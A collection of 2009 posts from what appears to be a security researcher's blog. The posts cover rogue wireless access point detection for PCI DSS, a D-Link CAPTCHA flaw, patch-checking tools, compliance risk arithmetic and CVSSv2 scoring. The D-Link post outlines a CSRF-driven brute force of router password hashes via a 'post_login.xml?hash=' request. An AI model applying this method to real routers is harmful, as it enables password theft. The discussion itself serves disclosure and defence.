вторник, 20 октября 2009 г.

PCI DSS and wireless networks

Again, we discuss PCI DSS and wireless networks http://www.securityfocus.com/archive/137/507096

But how can we determine if this rogue AP and especially rogue wireless clients (WLAN card into a back office server) are inside CDE? By signal level? But Kismet shows this information only for APs (not for clients) :(

I’ve already answered the question on

Informzaschita web site, but let’s repeat.


>how could I know that the wireless access point with enabled encryption is a part of our local network?

Access Point location can be detected in different ways. The easiest way is by traffic “in the air”. Even if the point uses strong encryption (not WEP), enough data to indentify the segment are sent in clear text. For example, sender’s MAC address. As an access point is a link -level device, it relays all segment broadcast requests “into the air”. As there are a lot of this kind of requests in the network (ARP, NetBIOS, IPv6, etc.), comparing MAC addresses of senders who send packets through the point, and the list of known MAC addresses from your network, it’s easy to detect the access point location. Additionally, you can send a great number of broadcast packets via utilities that realize ARP-ping, such as Cain or nmap.
Triangulation… Running after every beacon with an antenna is not an easy task.

>Whre can I find information about access point search by triangulation method, and what kind of antennais the best?

Parabolic and Yagi- antenna for 2,4 diapason are rather bulky, so panel ones are more comfortable to use, in spite of worse directivity and sensitivity to reflected signal.

>But if it’s really rightly configured access point WPA2+hidden+MAC filter. It takes long time to find until there’s no activity.

Any AP connected to network, “signals” anyway: - sends beacon (even if ESSID is empty) - relays broadcasts and multicast with source MAC addresses in clear text

Its’ difficult to image a network without broadcast requests. And I wrote above how to detect access point location by these requests.

>How to detect clients that connect to external access points

Clients that are authorized to connect to “external” access points, can be detected by active security assessment mechanisms. For example, there are three mechanisms in
MaxPatrol that helps to resolve the problem:
- inventory that analyzes wireless Windows clients settings,
- security assessment that analyzes insecure configurations (e.g., multihomed, no encryption, WEP usage),
- compliance management that sets black and white lists of access points which are allowed in the network.

By monitoring wireless network, but you need to list “your ” MAC addresses beforehand. It’s possible to do by active (see above) or passive (see below) mechanisms.

>How can I understand that this is my users? Something about it is written

here (Russian).

But in any case, a workstation (especially under Windows) sends a lot of interesting traffic which allows to define network membership. This is both NetBIOS Broadcast and

WPAD requests, and also DHCP requests which contain host and domain name...

But one question is still open – how to send this kind of traffic? Here

Gnivirdraw can help us.

>Active scanners don’t help us!!! Of course, sometimes to run along with laptop is useful :). But scanners can help to do the following:


- fingerprint in pentest mode of network devices (including AP).

- inventory of wireless client configuration (MAC addresses, lists of networks)

- analysis of access point configuration

- analysis of wireless device logs in order to find “bad” events

Thus some wireless problems are on the wire :)

понедельник, 19 октября 2009 г.

WASC Announcement: 2008 Web Application Security Statistics Published

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape. We ascertain which classes of attacks are the most prevalent regardless of the methodology used to identify them. Industry statistics such as those compiled by Mitre CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications, this project tries to be the equivalent for custom web applications.

This article contains Web application vulnerability statistics which was collected during penetration testing, security audits and other activities made by companies which were members of WASC in 2008. The statistics includes data about 12186 sites with 97554 detected vulnerabilities.

WASC Web Application Security Statistics 2008

Download.

четверг, 15 октября 2009 г.

Some plug about Bitrix


Recently we conducted audit of new security functions of "1С-Bitrix: Site management " to assess the compliance with Web Application Firewall Evaluation Criteria requirements of Web Application Security Consortium.

The story has continued on Chaos Constructions CC9 Festival" that took place on 29-30 August 2009 in Saint Petersburg, Russia.

"More than six hundred Russian hackers have been trying to hack down a server-installed content management software in attempt to get over its sophisticated Proactive Protection system. There had been more than 25.000 attacks recorded and effectively repulsed during the software crash test competition hours. The competition was organized by the Bitrix, Inc. team and Positive Technologies IT experts"


Bitrix Real-Time Hack Competition in Russia

25.000 Russian Hack Attacks Repulsed by Bitrix in Two Days

WAF-protected, tested "by Russian Hackers", PCI Compliant site from the box. Not bad, is not it?

среда, 3 июня 2009 г.

Add protection means add “a hole”

Funny news

New D-Link protection for Wi-Fi routers is a hole in security!

D-Link had barely announced updated firmware for wireless routers with protection from automatic registrations (CAPTCHA), when several enthusiasts found out that this new protection measures make routers more vulnerable to password theft.


http://www.securitylab.ru/news/379779.php


Details:

http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/


There are some comments on SecurityLab forum that say:

Is it again an attack with default password?

The situation is much more amusing, indeed. The problem is that CAPTCHA is used by D-Link to protect from Cross-Site Request Forgery (CSRF) which (to be more precise, exploitation method for a router) was greatly named Drive-by Pharming by Symantec. But implementation error (accepting of requests with valid hash without CAPTCHA) makes this protection to be a vulnerability.

If passwords are standard then there is a method to bypass basic authentication via Javscript (see "Breaking through the perimeter" http://www.securitylab.ru/analytics/292473.php ).

But if the password (or its derivative such as hash) is sent to GET (as Basic duplicate), then the situation is more interesting – an attacker could use not only standard password hash but also conduct user password brute force attack Javascript via CSRF from which CAPTCHA should protect.

It means that the vulnerability concerns not only standard passwords but also could increase the effectiveness of user password brute force attacks via CSRF, and standard password security (timeout, temporary lockout, etc.) does not work as not brute force itself but attempts to connect with different “normal” hashes are taken, used instead of session identifier. A simple script is enough for it, that call the address

GET /post_login.xml?hash=

and check whether the action was successful. The point is to trick a user to open the site:)

In general, rather interesting design error in authentication mechanism of web application.

понедельник, 18 мая 2009 г.

Tool for WINS and DNS (MS-09-008)

The utility is used to detect potentially dangerous entries in DNS and WINS services databases. The utility also allows local network scanning to detect hosts with dangerous NetBIOS names. If system administrators and security administrators use the utility regularly then it allows controlling potentially dangerous entries in name servers and availability of hosts with dangerous NetBIOS names in local network.



Detail information could be found in the article by Sergey Rublev and on SecurityLab:

http://www.securitylab.ru/news/extra/380522.php

http://www.securitylab.ru/_download/articles/wpad_weakness_en.pdf

Download here:
http://www.ptsecurity.ru/download/wpadcheck_en.zip

среда, 13 мая 2009 г.

Compliance management vs Risk management

If we consider the question of request compliance in terms of risk analysis, i.e. assume that:
threat – violation consequences described by the compliance enforcement agency (CEA :).

vulnerability – incompliant to requirements
attack – checks made by the CEA
counter-measure - compliant to requirements

so there is practically an unexampled situation – we have all necessary basic data for quantitative risk analysis based on the classical technique ARO x SLE = ALE.

http://www.windowsecurity.com/articles/Risk_Assessment_and_Threat_Identification.html

We have:

ARO – probability of CEA checks
SLE - violation consequences described by the law or CEA

This interesting situation not only proves that school rules still sometimes work, but also a great benefit of compliance as an engine of information security.

Lets consider some examples that are now widely known - Russian Federal Law 152 (On Personal Data) and PCI DSS.

PCI DSS

This is quite simple, as Visa and other payment systems decided not to taunt business and allow to shift action plan because of events in the world economy now. This is a delay in attack implementation in several years. Unexampled situation when you exactly know that this particular attack did not take place during a year. Or a couple of years. Just imagine a license from virus attacks or hardware theft for a year… A great thing!

So:

threat - fines (N x K$) or loss of operation prohibition (let it be also N x K$ for ease), SLE;
vulnerability - incompliant to requirements (PCI DSS);
attack – CEA (Visa, Mastercard, etc) response to action plan deviation (the probability that it will take place, ALE - 0 times a year)

Totally, we have:

Risk = (N x K$) x (0) = 0

Tat is that you can do nothing!!!

But! The key condition is that you have action plan. Accordingly, you should create it. By yourself or with QSA – as you wish. Unfortunately I do not have information about regulator response if there is no PCI DSS action plan, but I think in this case SLE is about counter-measure (audit) costs.

Federal Law 152

In this case everything is easy also.

threat - some variants

1. Administrative responsibility - fines
2. Suspension or termination of personal data processing in the company is the period of idle time/degradation of constrained business processes before elimination. I think you can take minimum 1/6 of a year.
3. Company and (or) its head is made responsible for criminal (civil, disciplinary, etc.) offence -– a catastrophe.
4. Licenses suspension or revocation for the company basic activity – closer to catastrophe in the current situation.

attack – check by CEA

With regard to newness and interest for regulator and the possibility of initiation from the outside (an application), the probability that the attack will be conducted in 2010 could be taken equal to 1.
For more detailed calculations by regions and business brunches the following statistics could be used:

http://community.livejournal.com/personal_data/721.html

Totally, we have (worse case scenario):

Risk = (the value of business) x (1) = (the value of business)

That is: there is a problem, and you have to solve it.

PS. There is no need to make far-reaching conclusions. It‘s just a funny story. We didn't sell FL-152 consulting :)

понедельник, 20 апреля 2009 г.

Microsoft has published regular Security Intelligence Report.

Russia is among leaders by infected computers percentage:
The infection metrics is about 21,1 for 1000 runs of "cleaner" , an world average index is 8,6. A very strange index.



It is possible that the index is strongly concerned with a possibility to infect different platforms:



I think nobody is surprised that a lot of home users with XP SP0, SP1 are afraid to update it because they are should that their cracked Windows versions will not further work. But will they have Malicious Software Removal Tool? Will a “master” bring on a floppy disk? Rather, something from Kaspersky or DrWeb.

This is a very strange situation. Can it really be corporate employees ?

PS. Actually this is a wonderful report.
The most common threat in Russia – Taterf which is spread through shared folders, in USA - Win32/Renos and Win32/Zlob. There are a lot data about Conficker in the report, but it is missed in statistics first lines.

Is it a wonder?

воскресенье, 12 апреля 2009 г.

Security in our life

I has taken a flight from Domodedovo airport (Moscow) recently, and thought a lot…
And my thoughts were hard… Hope, only in Britain and only on submarines.



PS. If somebody do not recognize – this is Symantec - Kido/Conficker/Downadup.

четверг, 19 марта 2009 г.

Webspider. Express vulnerability assesment

Concept preview of Webspider express security scanner (pure AJAX :) has been recently published – this is a tool that allows analyzing in seconds the software which is the most frequently used by attackers. The system is intended to make protection express analysis of Internet and Intranet users, users of electronic commerce systems and Internet provider clients.

You can test it here:

http://www.securitylab.ru/addons/webspider3/fast_check.php



The current version is able to detect a vulnerability in popular ActiveX components and plug-ins, Mozilla Firefox and Opera browsers, Java and Adobe Flash applications and also MS07-042, MS08-069 and MS09-002 updates.
We plan to publish a detailed article about the used techniques in April.

It's just preview, so be indulgently.

вторник, 10 марта 2009 г.

Positive Technologies Reasearch Lab

This year we decided to resume the publication of vulnerability details detected during researches and penetration testing.

http://en.securitylab.ru/lab/

In 2006, because of a number of reasons, we decided to shift the burden of publishing vulnerability details to software vendors and stop publishing the details about previously detected problems. However, many customers ask us to assist in vulnerability elimination in third-party vendor software. This induces us to resume the process.
The most interesting current problem (in my opinion) is a number of vulnerabilities in VMWare that allows attackers to gain access from guest to host OS. And right to the kernel.

I personally treated different methods to eliminate vulnerabilities in third-party vendor software, from Full-Disclosure extremism to selling vulnerabilities in the “white” market, for example, iDefense (http://labs.idefense.com/vcp/). Some thought are available here:
http://www.securitylab.ru/analytics/241826.php (Russian)

вторник, 24 февраля 2009 г.

We’ve published a network utility to check that security updates from MS08-065, MS08-067 and MS09-001 are installed in the system. The utility does not need administration privileges and works in pentest mode.
Feedback on the previous releases was quite positive, we decided to upgrade.




Additional info:
http://www.securitylab.ru/news/extra/368760.php

Downloads:
http://www.ptsecurity.com/download/pt-check-09-001.zip

понедельник, 26 января 2009 г.

Risks, risks, risks

I came across with vulnerabilities in UTM device management web interface during security analysis recently. Rather typical combination of CSRF and XSS is interesting because it allows attackers to get access to device command line and manage the system interactively in administrator’s browser. But this is not the whole point, the vulnerability is typicaly.
The most interesting (as always) was communication with the vendor. We did not agree about the vulnerability risk level that led to desperate correspondence. Here I would like to share with you our ideas in this field.
As a rule, risk level is set by software vendor or by a company that produces protection tools (vulnerability scanners, intrusion detection systems, etc.). In this case typical scheme similar to road regulations is used: low risk level (green), medium risk level (yellow), high risk level (red). Sometimes an additional 4th level is used – level of critical vulnerabilities.
Many producers use this approach, for example, Microsoft uses 4 vulnerability risk levels in its security bulletins.
But ‘traffic lights’ model is not transparent and greatly depends on expert world view and general state and other factors. That’s why we use CVSSv2 methodology.

English

http://www.first.org/cvss/cvss-guide.html

Russian
http://www.securitylab.ru/analytics/355336.php
http://www.securitylab.ru/analytics/356476.php

Rather simple metrics on which CVSSv2 is based allows assessing risks more or less definitely. In addition, the metrics allows assessing several additional factors as exploitation possibility and environment that is very important.
Quotation (Russian):
Leaving aside advantages and disadvantages of the methods, the following characteristics could affect the assessment reliability:
  1. Context dependence;
  2. System configuration dependence;
  3. Assessment method dependence.
Vulnerabilities of the same type could be of different risk level in different applications. For example, CSRF vulnerability could not be a threat for typical representation server or search engine, but is a critical vulnerability for e-mail or payment system web interface. As a result of information leakage, an attacker could access application logs (low or medium risk level) or download the backup copy of the site (high risk level).
The system configuration could also affect the risk level. Thus, “SQL Injection” vulnerability is usually classified as a high risk level vulnerability. But if web application has restricted rights on DB server, it is a vulnerability of medium or low risk level. In another installation or implementation the same vulnerability could be used to access operating system with superuser rights that makes the vulnerability critical.
Assessment methods greatly affect vulnerability risk level. For the above example, a network scanner could just detect “SQL Injection” as a problem. To determine the available for potential attackers privileges one should try to use the vulnerability or get detailed information about communications between web application and DB server via white box method.
So it is absolutely incorrect to give to different vulnerabilities of the same type equal risk levels without detailed analysis (for example, SQL Injection).
Here is an example.

Let’s assume that SQL Injection allows to get access to DBMS with minimum web server privileges, for example, db_reader. And web application does not store confidential data (for example, passwords) in DBMS.
So CVSSv2 vector and risk level are:
In the other case, if user passwords are stored in DBMS (including administrator password), risk level is higher as the system is more vulnerable to attacks according to data confidentiality.

(AV:N/AC:L/Au:N/C:C/I:N/A:P/E:H/RL:W/RC:C)= 8.1

If web server has unreasonably extended privileges on DB server, for example, sa privileges, the same vulnerability is much more dangerous:

(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:W/RC:C) = 9.5

It we reduce it into “traffic lights” model or PCI DSS 5 levels (Urgent, Critical, High, Medium, Low), the result is:

1. Medium (2) and High (3)
2. Medium (2) and Critical (4)
3. High (3) and Urgent (>4).

It means that vulnerability risk level could vary greatly depending on the system and its settings.

CVSSv2 vector for XSS (see description above at the beginning of the note)

(AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:C) = 6.9

So in terms of PCI DSS (it is this model that is the most popular now) the risk level of the issue is High or even Critical, but not Low. But in any case the audit is failed :))

PS. I can understand vendor’s reasons, as if security is not taken into account when the software is designed then (quotation) "hardening the management interface would probably imply a complete redesign of it".

Here it is – the various risk assessment.